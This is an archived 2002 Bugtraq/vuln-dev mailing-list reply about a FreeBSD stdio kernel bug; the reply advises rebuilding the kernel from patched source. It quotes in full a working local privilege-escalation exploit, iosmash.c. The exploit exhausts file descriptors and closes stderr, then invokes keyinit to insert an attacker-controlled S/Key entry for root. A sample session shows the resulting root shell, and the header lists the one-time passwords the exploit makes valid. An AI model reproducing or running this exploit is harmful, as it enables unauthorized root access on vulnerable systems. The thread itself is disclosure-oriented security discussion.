Re: cheers

From: zeno (bugtraq@cgisecurity.net)
Date: 04/24/02

• Previous message: Bill Weiss: "Re: /lib/ld-2.2.4.so"
• Maybe in reply to: KF: "cheers"
• Next in thread: Onie Camara: "Re: cheers"
• Reply: Onie Camara: "Re: cheers"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

From: zeno <bugtraq@cgisecurity.net>
To: neil@restricted.dyndns.org (Onie Camara)
Date: Wed, 24 Apr 2002 16:58:52 -0400 (EDT)

>
> Even on my FreeBSD 4.5 STABLE, I got root access. This is terrifying. :-)
>
> So any solutions?

cvsup new source rebuild kernel. A patch is out already.

- zeno@cgisecurity.com

>
> ----- Original Message -----
> From: "KF" <dotslash@snosoft.com>
> To: "bugtraq" <bugtraq@securityfocus.org>; "vuln-dev"
> <vuln-dev@security-focus.com>
> Sent: Tuesday, April 23, 2002 1:24 AM
> Subject: cheers
>
>
> > http://www.phased.home.ro/iosmash.c
> >
> > -KF
> >
> >
>
>
> ----------------------------------------------------------------------------
> ----
>
>
> >
> > /*
> > phased/b10z
> > phased@snosoft.com
> > 23/04/2002
> >
> > stdio kernel bug in All releases of FreeBSD up to and including
> 4.5-RELEASE
> > decided to make a trivial exploit to easily get root :)
> >
> > > id
> > uid=1003(phased) gid=999(phased) groups=999(phased)
> > > ./iosmash
> > Adding phased:
> > <--- HIT CTRL-C --->
> > > su
> > s/key 98 snosoft2
> > Password:MASS OAT ROLL TOOL AGO CAM
> > xes#
> >
> > this program makes the following skeys valid
> >
> > 95: CARE LIVE CARD LOFT CHIC HILL
> > 96: TESS OIL WELD DUD MUTE KIT
> > 97: DADE BED DRY JAW GRAB NOV
> > 98: MASS OAT ROLL TOOL AGO CAM
> > 99: DARK LEW JOLT JIVE MOS WHO
> >
> > http://www.snosoft.com
> > cheers Joost Pol
> > */
> >
> > #include <stdio.h>
> > #include <unistd.h>
> >
> > int main(int argc, char *argv[]) {
> > while(dup(1) != -1);
> > close(2);
> > execl("/usr/bin/keyinit",
> > "\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n");
> > }
> >
> >
>
>

---

• Previous message: Bill Weiss: "Re: /lib/ld-2.2.4.so"
• Maybe in reply to: KF: "cheers"
• Next in thread: Onie Camara: "Re: cheers"
• Reply: Onie Camara: "Re: cheers"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Relevant Pages Re: cheers ... Even on my FreeBSD 4.5 STABLE, I got root access. ... > Password:MASS OAT ROLL TOOL AGO CAM ... (Vuln-Dev) Re: FreeBSD Kernel buffer overflow ... In underground comunities it's not so rare, patching ... > is better than having a new exploits for freebsd. ... to have the sanity check of parameter numbers for a system call entry ... because it need root access already and if the gain of root is considered ... (freebsd-hackers) Re: Low-cost dedicated FreeBSD server or non-jail VPS? ... root access. ... For a VPS, I realize this is really psuedo-root access. ... I once rented a VPS on a FreeBSD box that was split into virtual boxes ... FreeBSD as a guest OS, ... (freebsd-questions) Low-cost dedicated FreeBSD server or non-jail VPS? ... root access. ... For a VPS, I realize this is really psuedo-root access. ... I once rented a VPS on a FreeBSD box that was split into virtual boxes ... to understand and assimilate technology. ... (freebsd-questions) Re: Low-cost dedicated FreeBSD server or non-jail VPS? ... root access. ... For a VPS, I realize this is really psuedo-root access. ... FreeBSD as a guest OS, ... (freebsd-questions)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > vuln-dev  > 2002-04